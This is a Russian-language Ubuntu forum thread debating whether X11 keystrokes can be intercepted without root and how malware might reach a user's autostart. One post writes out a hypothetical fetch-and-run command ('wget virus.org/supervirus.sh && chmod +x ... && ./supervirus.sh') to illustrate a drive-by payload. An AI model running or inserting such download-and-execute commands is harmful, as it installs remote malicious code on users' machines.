Форум русскоязычного сообщества Ubuntu


Хотите сделать посильный вклад в развитие Ubuntu и русскоязычного сообщества?
Помогите нам с документацией!

Автор Тема: Глобальный перехват клавиатуры без рута возможен?  (Прочитано 14779 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн agimoura

  • Активист
  • *
  • Сообщений: 325
    • Просмотр профиля
Да сдался мне Ваш компьютер...
(Сорри за оффтоп)

Примерно такую тираду я называю "словоблудием"...  :coolsmiley: И именно благодаря такому словоблудию и подобным теоретическим рассуждениям у новичков остаётся виндовая паранойя о вирусах в линуксе...  >:(
А ключевые слова в вашем последнем топике: "...Только сегодня в поисках виндового драйвера...". Плюс виндовая привычка пользователей всё искать на всяких варезах...  :D :D

Оффлайн buggykey

  • Любитель
  • *
  • Сообщений: 94
    • Просмотр профиля
Во-первых, давайте без хамства - это форум, а не базар, я Вам на мозоль не наступал (кажется).
А если хотите конкретики - Вы хоть раз вводили рутовый пароль, добавляя в автозапуск в Гноме, или в КДЕ какой-нибудь Скайп, Тандерберд и т. д.?
Выводы?
Так что паранойя - это к психиатру, а не на forum.ubuntu.ru.
А что касается моей привычки искать виндовый софт на варезниках - если Вы попробуете в яндексе набрать слово "киска" (в поисках фото кошачьих), увидите много картинок "сильно не по теме". Так что уж, на что натыкался - о том и говорю.

Оффлайн agimoura

  • Активист
  • *
  • Сообщений: 325
    • Просмотр профиля
...
А если хотите конкретики - .....

Вот-вот! О конкретике я и сказал раньше! Давайте, вместо голых теоретических размышлений и предположений (это можно, это возможно, а это вообще проще простого) проведём маленький практический эксперимент. После которого с полным правом можно сказать:"это возможно сделать, ибо у меня получилось!"  ;) :D
Или, другими словами: у меня есть пример скрипта, который тем или иным способом можно внедрить в систему соседа, причём сосед об этом ни сном ни духом, и этот скрипт будет отправлять мне те данные, что я захочу (сведения о нажатых клавишах клавиатуры, например)! И никакого рута мне при этом не понадобится!  :idiot2:
Всё остальное — просто голословный трёп, будоражащий мозги новичков.  :coolsmiley:


Оффлайн artifactor

  • Старожил
  • *
  • Сообщений: 1769
    • Просмотр профиля
    • Leaf Watoru's notes
интересная вещь.
в общем, buggykey говорит дело, я об этом тоже говорил ранее. но вот в чём беда: если вы скачиваете бинарник или скрипт через браузер(я для примера возьму оперу, т.к. ей пользуюсь), то по умолчанию запрещён запуск этого файла. если дело обстоит с Windowsким приложением,то в xubuntu убрали разрешение о запуске, т.е. из-под thunar'а я смогу запустить без прав запуска, из терминала - нет.
если скачать архив *.tar.gz, то там могут быть файлы, у которых уже есть права на запуск.
если будет уязвимость в браузере или в джаве, которая сможет создать файл с заранее подготовленным текстом(вроде wget virus.org/supervirus.sh && chmod +x supervirus.sh && ./supervirus.sh), то ещё нужно проверить, будет ли он это запускать. я пробовал прописывать больше одной команды через диспетчер настроек(т.е. там, где всё разрешено), и то невозможно было создать больше одной команды: ничего после && не работало и команда вообще не выполнялась. в итоге пришлось делать отдельный скрипт. если просто прописать команду, даже просто запуск приложения, то оно не будет выполняться. если через sleep - будет.

вот так немного можете успокоиться, но предупреждаю, что на кедах, гноме и юнайти всё может быть иначе.
Xubuntu 16.04 x64
Обои для рабочего стола и Space Ambient

Оффлайн staso

  • Активист
  • *
  • Сообщений: 437
    • Просмотр профиля
...
А если хотите конкретики - .....

Вот-вот! О конкретике я и сказал раньше! Давайте, вместо голых теоретических размышлений и предположений (это можно, это возможно, а это вообще проще простого) проведём маленький практический эксперимент. После которого с полным правом можно сказать:"это возможно сделать, ибо у меня получилось!"  ;) :D
Или, другими словами: у меня есть пример скрипта, который тем или иным способом можно внедрить в систему соседа, причём сосед об этом ни сном ни духом, и этот скрипт будет отправлять мне те данные, что я захочу (сведения о нажатых клавишах клавиатуры, например)! И никакого рута мне при этом не понадобится!  :idiot2:
Всё остальное — просто голословный трёп, будоражащий мозги новичков.  :coolsmiley:


Конкретики. Есть у меня. Почитайте хоть этот форум. Обсуждалось уже как установка звонилки от  ЮСБ модема давала рутовые привилегии всеем на машинке. Вам абсолютно верно говорят - заставить юзера выполнить зловреда  это весьма простая задача.

Оффлайн ArcFi

  • Старожил
  • *
  • Сообщений: 15189
    • Просмотр профиля
    • aetera.net
Товарищи, объясняю ещё раз для непонятливых: то, что вы сами запускаете, — это ни фига не глобальный перехват.
Клавиатуру другого аккаунта (в ином DISPLAY) вы таким макаром не перехватите.

Оффлайн buggykey

  • Любитель
  • *
  • Сообщений: 94
    • Просмотр профиля
Товарищи, объясняю ещё раз для непонятливых: то, что вы сами запускаете, — это ни фига не глобальный перехват.
Клавиатуру другого аккаунта (в ином DISPLAY) вы таким макаром не перехватите.
Вот с этим спорить не буду.
Я имел ввиду только установку скрипта в автозапуск для конкретного юзера.

Оффлайн victor00000

  • Старожил
  • *
  • Сообщений: 15568
  • Глухонемой (Deaf)
    • Просмотр профиля
buggykey,
L~$ DISPLAY=:1.1 xdotool key A
Error: Can't open display: (null)
Failed creating new xdo instance
L~$ DISPLAY=:0.0 xdotool key A
AL~$ A
Wars ~.o

Оффлайн Sly_tom_cat

  • Don't worry, be happy!
  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 12130
  • Xubuntu 22.04
    • Просмотр профиля
    • Github
Собственно тему уже давно обсудили:
Перехват клавиатурных нажатий не требует прав рута - это дыра/фича x-windows.
Но для организации взлома таким образом - нужно внедрится на машину атакуемого.
Внедрение - отдельный вопрос выходящий далеко за рамки данного обсуждения. Кроме того - уж если есть возможность внедрится (запустить на атакуемой машине что-либо даже с правами пользователя) то путей взлома системы - много и кей-логер - не самый скрытый путь.
Посему считаю вопрос закрытым и, дабы не плодить здесь ненужного флейма, тема заблокирована.
Индикатор для Yandex-Disk: https://forum.ubuntu.ru/index.php?topic=241992
UEFI-Boot - грузимся без загрузчика: https://help.ubuntu.ru/wiki/uefiboot

 

Страница сгенерирована за 0.057 секунд. Запросов: 25.